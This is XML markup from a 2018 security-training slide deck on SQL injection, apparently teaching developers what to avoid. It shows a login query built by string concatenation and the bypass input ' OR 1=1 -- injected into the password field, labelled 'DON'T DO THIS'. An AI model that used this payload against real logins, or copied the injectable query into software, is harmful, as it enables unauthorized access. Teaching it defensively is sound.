            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:t> u.password='           </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="admin"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12155254" y="9236158"/>
            <a:ext cx="1954264"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chemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="' OR 1=1 --"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14183183" y="10055373"/>
            <a:ext cx="3382765"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chemeClr val="accent6">
                    <a:satOff val="24555"/>
                    <a:lumOff val="22232"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>' OR 1=1 --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8888940" y="10072624"/>
            <a:ext cx="9675401" cy="895774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF320A"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="70206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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9295117" y="4574099"/>
            <a:ext cx="5793766" cy="618364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="' OR 1=1 --"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9311524" y="4595943"/>
            <a:ext cx="2035275"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3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="24555"/>
                    <a:lumOff val="22232"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>' OR 1=1 --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="."/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9295117" y="3007690"/>
            <a:ext cx="5793766" cy="618363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="384618"/>
                <a:satOff val="3869"/>
                <a:lumOff val="5802"/>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FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="admin"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9344277" y="3016834"/>
            <a:ext cx="1277554"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3000">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12998507" y="3628219"/>
            <a:ext cx="1" cy="5654305"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="384618"/>
                <a:satOff val="3869"/>
                <a:lumOff val="5802"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16137031" y="4853865"/>
            <a:ext cx="1" cy="5069459"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15063189" y="4883280"/>
            <a:ext cx="1096244" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="7" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="460"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="460"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="462"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="462"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="453"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="459"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="458"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="464"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="463"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="463"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45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0" presetID="1" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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1" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="463" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="464" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="454" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="458" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="462" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="455" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="460" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="459" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="453" grpId="4"/>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8"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46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470" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-44055" y="1858678"/>
            <a:ext cx="24472109" cy="5216132"/>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473" name="SELECT *…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7953015" y="2033106"/>
            <a:ext cx="6446466" cy="486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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  u.username=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:t> u.password=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:t> 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="22454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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="476" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1179249" y="8703288"/>
          <a:ext cx="22271843" cy="2236187"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1065417"/>
                <a:gridCol w="3026846"/>
                <a:gridCol w="11468929"/>
                <a:gridCol w="6710648"/>
              </a:tblGrid>
              <a:tr h="1118092">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
